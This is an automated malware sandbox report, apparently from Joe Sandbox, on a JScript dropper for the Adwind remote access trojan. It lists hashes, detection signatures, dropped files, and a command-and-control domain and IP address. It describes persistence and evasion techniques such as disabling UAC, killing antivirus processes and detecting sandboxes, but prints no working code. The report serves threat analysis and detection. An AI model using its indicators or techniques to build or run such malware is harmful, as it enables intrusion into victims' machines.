Windows Analysis Report
gcahfpmhcn.js

Overview

General Information

Sample name:	gcahfpmhcn.js
Analysis ID:	1426956
MD5:	5bca887380e1881f351c22574d257e41
SHA1:	987634d53966aa6e84c72ad366bb78e619cb674a
SHA256:	5f4b5467cccbbc2f2c5771d9547e7fca350df341d154f4d83a4442b7a44cdf06
Tags:	adwindjs
Infos:

Detection

ADWIND

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected ADWIND Rat

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected AdWind RAT

Yara detected AdWind RATs dll

Creates a Image File Execution Options (IFEO) Debugger entry

Creates an undocumented autostart registry key

Disable UAC(promptonsecuredesktop)

Disables UAC (registry)

Disables Windows system restore

Disables zone checking for all users

Excessive usage of taskkill to terminate processes

Exploit detected, runtime environment starts unknown processes

Found suspicious ZIP file

Java source code contains strings found in CrossRAT

JavaScript source code contains functionality to generate code involving a shell, file or stream

Sigma detected: Adwind RAT / JRAT File Artifact

Sigma detected: Potential Attachment Manager Settings Associations Tamper

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses dynamic DNS services

Uses regedit.exe to modify the Windows registry

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Add executable type to lowriskfiletypes to avoid warning prompt

Binary contains a suspicious time stamp

Changes image file execution options

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

PE file contains sections with non-standard names

PE file does not import any functions

Queries the installed Java version

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Shell Process Spawned by Java.EXE

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara signature match

Classification

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs	Avira: detection malicious, Label: VBS/Antiav.jre
Source: C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Avira: detection malicious, Label: VBS/Antiav.jre
Source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll	Avira: detection malicious, Label: TR/Spy.Agent.lusda
Source: C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs	Avira: detection malicious, Label: VBS/Agent.281
Source: C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs	Avira: detection malicious, Label: VBS/Agent.281

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll

ReversingLabs: Detection: 85%

Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssv\obj\ssv.pdb source: xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdcpr\dcpr.pdb// source: xcopy.exe, 00000012.00000003.1789079270.000000000229D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\jp2iexp\obj\jp2iexp.pdb source: xcopy.exe, 00000012.00000003.1828354060.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libbci\bci.pdb source: xcopy.exe, 00000012.00000003.1785460325.000000000229D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdcpr\dcpr.pdb source: xcopy.exe, 00000012.00000003.1789079270.000000000229D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdb source: xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: xcopy.exe, 00000012.00000003.1809783425.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_shmem\dt_shmem.pdb source: xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb.. source: xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb** source: xcopy.exe, 00000012.00000003.1843767003.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: xcopy.exe, 00000012.00000003.1837839757.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdb// source: xcopy.exe, 00000012.00000003.1800215371.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssv\obj\ssv.pdb, source: xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb source: xcopy.exe, 00000012.00000003.1834933106.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libverify\verify.pdb source: xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmlib_image\mlib_image.pdb source: xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb source: xcopy.exe, 00000012.00000003.1843767003.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsdt\jsdt.pdb source: xcopy.exe, 00000012.00000003.1830377915.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: xcopy.exe, 00000012.00000003.1837383941.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000012.00000003.1806873100.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjaas\jaas_nt.pdb source: xcopy.exe, 00000012.00000003.1805928681.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pcsc\j2pcsc.pdb source: xcopy.exe, 00000012.00000003.1800997315.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: xcopy.exe, 00000012.00000003.1806079122.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: xcopy.exe, 00000012.00000003.1842945665.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\jp2native\obj\jp2native.pdb source: xcopy.exe, 00000012.00000003.1829056839.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjdwp\jdwp.pdb>> source: xcopy.exe, 00000012.00000003.1809732405.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\38\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: xcopy.exe, 00000012.00000003.1842514297.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: xcopy.exe, 00000012.00000003.1835741846.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\eula\obj\eula.pdb..* source: xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjpeg\jpeg.pdbGG source: xcopy.exe, 00000012.00000003.1830214634.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb,,+ source: xcopy.exe, 00000012.00000003.1806079122.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjava_crw_demo\java_crw_demo.pdb source: xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libresource\resource.pdb source: xcopy.exe, 00000012.00000003.1837161328.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: xcopy.exe, 00000012.00000003.1837383941.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: xcopy.exe, 00000012.00000003.1837839757.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: xcopy.exe, 00000012.00000003.1835741846.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2gss\j2gss.pdb source: xcopy.exe, 00000012.00000003.1800946728.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjdwp\jdwp.pdb source: xcopy.exe, 00000012.00000003.1809732405.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: xcopy.exe, 00000012.00000003.1831821826.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawt\jawt.pdb source: xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdb source: xcopy.exe, 00000012.00000003.1800215371.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000012.00000003.1806873100.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb8 source: xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsoundds\jsoundds.pdb source: xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: work\38\s\\binaries\x86ret\bin\i386\\msvcp140_1.i386.pdb source: xcopy.exe, 00000012.00000003.1833916829.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000012.00000003.1791025674.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000012.00000003.1835216977.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000012.00000003.1830592502.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjava\java.pdb source: xcopy.exe, 00000012.00000003.1807146434.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdbEE, source: xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libinstrument\instrument.pdb source: xcopy.exe, 00000012.00000003.1800789356.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjpeg\jpeg.pdb source: xcopy.exe, 00000012.00000003.1830214634.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000001.00000002.2965408345.000000006EEF8000.00000002.00000001.01000000.0000000A.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\jp2iexp\obj\jp2iexp.pdbKK5 source: xcopy.exe, 00000012.00000003.1828354060.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: xcopy.exe, 00000012.00000003.1831821826.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000012.00000003.1835216977.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb source: xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb'' source: xcopy.exe, 00000012.00000003.1834933106.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: xcopy.exe, 00000012.00000003.1830592502.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb source: xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb source: xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmlib_image\mlib_image.pdbMM source: xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\eula\obj\eula.pdb source: xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Exploit detected, runtime environment starts unknown processes

Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

Process created: C:\Windows\System32\conhost.exe

JavaScript source code contains functionality to generate code involving a shell, file or stream

Source: gcahfpmhcn.js	Return value : ['"adodb.stream"']			Go to definition
Source: gcahfpmhcn.js	Return value : ['"adodb.stream"']			Go to definition

Networking

Uses dynamic DNS services

Source: unknown

DNS query: name: pnauco5.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49744 -> 103.151.123.225:5000

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: pnauco5.ddns.net

Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/3
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodings9
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsorg/a9
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error=
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errorSn
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errors/inter=
